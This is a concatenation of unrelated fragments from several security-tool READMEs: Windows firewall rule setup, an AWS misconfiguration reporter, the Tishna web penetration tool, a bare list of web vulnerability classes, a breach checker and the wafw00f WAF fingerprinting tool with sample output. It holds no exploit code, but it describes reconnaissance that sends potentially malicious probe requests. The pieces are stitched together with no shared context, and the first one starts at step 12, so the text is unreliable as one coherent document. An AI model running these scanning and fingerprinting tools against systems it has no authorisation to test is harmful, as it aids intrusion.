12. Follow prompt output, (ie. hit enter each time to proceed until done), it will take at least 10 minutes of your attention.
13. If you encounter errors, you have several options such as, ignore the errors or fix the script that produced the error and re-run that script once again later.
14. Once execution is done recall execution policy from step 5 and type: (ie. if previous policy was "RemoteSigned")
    Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -Force\
15. Now that rules are applied you may need to adjust some of them in Local Group Policy, not all the rules are enabled by default and you may want to toggle default Allow/Block behavior for some rules, rules for programs which do not exist need to be made additionally.
    See next sections for more info.

1. Press Windows key and type: secpol.msc
2. Righ click on secpol.msc and click Run as administrator
3. Expand node: Windows Defender Firewall with Advanced Security
4. Expand node: Windows Defender Firewall with Advanced Security - Local Group Policy Object
5. Click on either Inbound or Outbound node to view and manage the rulles you applied with Powershell script.

1. Execute SetupFirewall.ps1 and hit enter only for rullesets you want, otherwise type n and hit enter to skip current ruleset.
2. Inside powershell navigate to folder containing the ruleset script you want, and execute individual Powershell script.
3. You may want to run FirewallProfile.ps1 to apply default firewall behavior, or you can do it manually in GPO.

1. Using Local Group Policy, this method gives you limited freedom on what you can do whith the rules, such as disabling them or changing some attributes.
2. Editting Powershell scripts, this method gives you full control, you can improve the rules, add new ones or screw them up.

1. Note that each rule uses exactly the same order or paramters split into exactly the same number of lines.
   This is so that when you need to search for something it's easy to see what is where right away.
2. Provide documentation and official reference for your rules so that it can be easy to verify that these rules do not contain mistakes, for example, for ICMP rules you would provide a link to IANA with relevant reference document.
3. If you would like to suggest new rules or improving existing ones, but you do not have the skills to upload an update here, please open new issue here on github and provide details prefferably with documentation.
4. To contribute rules, it is also important that each rule contains good description of it's purpose, when a user clicks on a rule in firewall GUI he wants to see what this rule is about and easily conclude whether to enable/disable the rule or allow/block the traffic.
5. It is also important that a rule is very specific and not generic, that means specifying protocol, IP addresses, ports, system user, interface type and other relevant information.
   for example just saying: allow TCP outbound port 80 for any address or any user or no explanation what is this supposed to allow or block is not acceptable.

• Search iam users based on creation date
• Search buckets public
• Search security group with inbound rule for 0.0.0.0/0
• Search elastic ip dissociated
• Search volumes available
• Search AMIs with permission public
• Search internet gateways detached

pip3 install --user -r requirements.txt

IAM_MAX_ACCESS_KEY_AGE default is 60 days.

Usage: aws_report.py [OPTIONS]

Options:
  --s3           Search buckets public in s3
  --iam          Search iam users based on creation date
  --sg           Search security groups with inbound rule 0.0.0.0
  --elasticip    Search elastic IP not associated
  --volumes      Search volumes available
  --ami          Search AMIs with permission public
  --owner TEXT   Defines the owner of the resources to be found
  --igw          Search internet gateways detached
  --region TEXT  Defines the region of resources
  --help         Show this message and exit.

python3 aws_report.py --s3
python3 aws_report.py --iam
python3 aws_report.py --owner 296193067842 --ami

docker run -it -e AWS_ACCESS_KEY_ID=you-access-key -e AWS_SECRET_ACCESS_KEY=you-secret-key gmdutra/aws-report --s3

[+]Email     gmdutra.eu@gmail.com
[+]Linkedin  linkedin.com/in/gmdutra
[+]Twitter   twitter.com/gmdutrax

• Software have 62 Options with full automation and can be use for web security swiss knife

• Tishna is Web Server Security Penetration Software for Ultimate Security Analaysis
• Kali, Parrot OS, Black Arch, Termux, Android Led TV

• Cyber Space (Computer Security)
• Terror Security (Computer Security)
• National Cyber Security Services

• Tishna is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.
• It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.
• With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.
• Tishna software can audit, servers and web behaviour.
• Tishna can perform Scanning& Enumeration as much as possible of target.
• It’s first step to stop cyber criminals by securing your Servers and Web Application Security.
• Tishna is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

• git clone https://github.com/haroonawanofficial/Tishna.git
• cd Tishna
• sudo chmod u+x *.sh
• ./Kali_Installer.sh
• Tishna will integrate as system software
• Dependencies will be handled automatically
• Third party software(s)/dependencies/modules will be handled automatically

• Haroon Awan
• mrharoonawan@gmail.com

• Blind RCE
• XSSI
• PHAR Deserialization
• PHP Object Injection
• PHP Object Injection via Cookies
• PHP Object Injection (Object Reference)
• SSRF
• Variables variable

git clone https://github.com/Viralmaniar/XposedOrNot.git
cd XposedOrNot
pip install -r requirements.txt
python XposedorNot.py

 {
  "Error": "Not found"
}

• Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions.
• If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
• If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.

$ wafw00f -l


                ______                                                
               /      \                                               
              (  W00f! )                                              
               \  ____/                                               
               ,,    __            404 Hack Not Found                 
           |`-.__   / /                      __     __                
           /"  _/  /_/                       \ \   / /                
          *===*    /                          \ \_/ /  405 Not Allowed
         /     )__//                           \   /                  
    /|  /     /---`                        403 Forbidden
    \\/`   \ |                                 / _ \ 
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error
      `_____``-`                             /_/   \_\

                        ~ WAFW00F : v2.0.0 ~
        The Web Application Firewall Fingerprinting Toolkit

[+] Can test for these WAFs:

  WAF Name                      Manufacturer
  --------                      ------------

  ACE XML Gateway               Cisco
  aeSecure                      aeSecure
  AireeCDN                      Airee
  Airlock                       Phion/Ergon
  Alert Logic                   Alert Logic
  AliYunDun                     Alibaba Cloud Computing
  Anquanbao                     Anquanbao
  AnYu                          AnYu Technologies
  Approach                      Approach
  AppWall                       Radware
  Armor Defense                 Armor
  ArvanCloud                    ArvanCloud
  ASP.NET Generic               Microsoft
  ASPA Firewall                 ASPA Engineering Co.
  Astra                            Czar Securities
  AzionCDN                      AzionCDN
  Barikode                      Ethic Ninja
  Barracuda                     Barracuda Networks
  Bekchy                        Faydata Technologies Inc.
  Beluga CDN                    Beluga
  BinarySec                     BinarySec
  BitNinja                      BitNinja
  BlockDoS                      BlockDoS
  Bluedon                       Bluedon IST
  CacheWall                     Varnish
  CacheFly CDN                  CacheFly
  Comodo cWatch                 Comodo CyberSecurity
  Chuang Yu Shield              Yunaq
  Cloudbric                     Penta Security
  Cloudflare                    Cloudflare Inc.
  Cloudfloor                    Cloudfloor DNS
  Cloudfront                    Amazon
  CrawlProtect                  Jean-Denis Brun
  DataPower                     IBM
  DenyALL                       Rohde & Schwarz Cyber   Security
  Distil                        Distil Networks
  DOSarrest                     DOSarrest Internet Security
  DotDefender                   Applicure Technologies
  Edgecast                      Verizon Digital Media
  Eisoo Cloud Firewall          Eisoo
  Expression Engine             EllisLab
  BIG-IP AppSec Manager         F5 Networks
  BIG-IP AP Manager             F5 Networks
  Fastly                        Fastly CDN
  FirePass                      F5 Networks
  FortiWeb                      Fortinet
  Greywizard                    Grey Wizard
  Huawei Cloud Firewall         Huawei
  HyperGuard                    Art of Defense
  Imunify360                    CloudLinux
  Incapsula                     Imperva Inc.
  IndusGuard                    Indusface
  Instart DX                    Instart Logic
  ISA Server                    Microsoft
  Jiasule                       Jiasule
  Ko   na SiteDefender             Akamai
  KS-WAF                        KnownSec
  KeyCDN                        KeyCDN
  LimeLight CDN                 LimeLight
  LiteSpeed                     LiteSpeed Technologies
  Open-Resty Lua Nginx          FLOSS
  Oracle Cloud                  Oracle
  Malcare                       Inactiv
  MaxCDN                        MaxCDN
  ModSecurity                   SpiderLabs
  NAXSI                         NBS Systems
  Nemesida                      PentestIt
  NevisProxy                    AdNovum
  NetContinuum                  Barracuda Networks
  NetScaler AppFirewall         Citrix Systems
  Newdefend                     NewDefend
  NexusGuard Firewall           NexusGuard
  NinjaFirewall                 NinTechNet
  NullDDoS Protection           NullDDoS
  NSFocus                       NSFocus Global Inc.
  OnMessage Shield              BlackBaud
  PerimeterX                    PerimeterX
  PentaWAF                      Global Network Services
  pkSecurity IDS                pkSec
  PowerCDN                      PowerCDN
  Profense                      ArmorLogic
  Puhui                         Puhui
  Qiniu                         Qiniu CDN
  Reblaze                       Reblaze
  RSFirewall                    RSJoomla!
  Sabre Firewall                Sabre
  Safe3 Web Firewall            Safe3
  Safedog                       SafeDog
  Safeline                      Chaitin Tech.
  SecKing                       SecKing
  eEye SecureIIS                BeyondTrust
  SecuPress WP Security         SecuPress
  SecureSphere                  Imperva Inc.
  Secure Entry                     United Security Providers
  SEnginx                       Neusoft    
  ServerDefender VP             Port80 Software
  Shield Security               One Dollar Plugin
  Shadow Daemon                 Zecure  
  SiteGround                    SiteGround 
  SiteGuard                     Sakura Inc.   
  Sitelock                      TrueShield
  SonicWall                     Dell        
  UTM Web Protection            Sophos   
  Squarespace                   Squarespace  
  SquidProxy IDS                SquidProxy
  StackPath                     StackPath
  Sucuri CloudProxy             Sucuri Inc.
  Teros                         Citrix Systems
  Trafficshield                 F5 Networks
  TransIP Web Firewall          TransIP  
  URLScan                       Microsoft
  UEWaf                         UCloud
  Varnish                       OWASP 
  Viettel                       Cloudrity
  VirusDie                         VirusDie LLC
  Wallarm                       Wallarm Inc.
  WatchGuard                    WatchGuard Technologies
  WebARX                        WebARX Security Solutions
  WebKnight                     AQTRONIX
  WebLand                       WebLand
  RayWAF                        WebRay Solutions
  WebSEAL                       IBM
  WebTotem                      WebTotem
  West263 CDN                   West263CDN
  Wordfence                     Defiant 
  WP Cerber Security            Cerber Tech
  WTS-WAF                       WTS      
  360WangZhanBao                360 Technologies
  XLabs Security WAF            XLabs
  Xuanwudun                     Xuanwudun
  Yundun                        Yundun
  Yunsuo                        Yunsuo
  Yunjiasu                      Baidu Cloud Computing
  YXLink                        YxLink Technologies
  Zenedge                       Ze   nedge
  ZScaler                       Accenture

$  wafw00f https://example.org

                ______
               /      \
              (  W00f! )
               \  ____/
               ,,    __            404 Hack Not Found
           |`-.__   / /                      __     __
           /"  _/  /_/                       \ \   / /
          *===*    /                          \ \_/ /  405 Not Allowed
         /     )__//                           \   /
    /|  /     /---`                        403 Forbidden
    \\/`   \ |                                 / _ \
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error
      `_____``-`                             /_/   \_\

                        ~ WAFW00F : v2.0.0 ~
        The Web Application Firewall Fingerprinting Toolkit

[*] Checking https://example.org
[+] The site https://example.org is behind Edgecast (Verizon Digital Media) WAF.
[~] Number of requests:    2

python setup.py install

• Documentation/Wiki
• Pypi Package Repository

• Sandro Gauci (@SandroGauci)
• Pinaki Mondal (@0xInfection)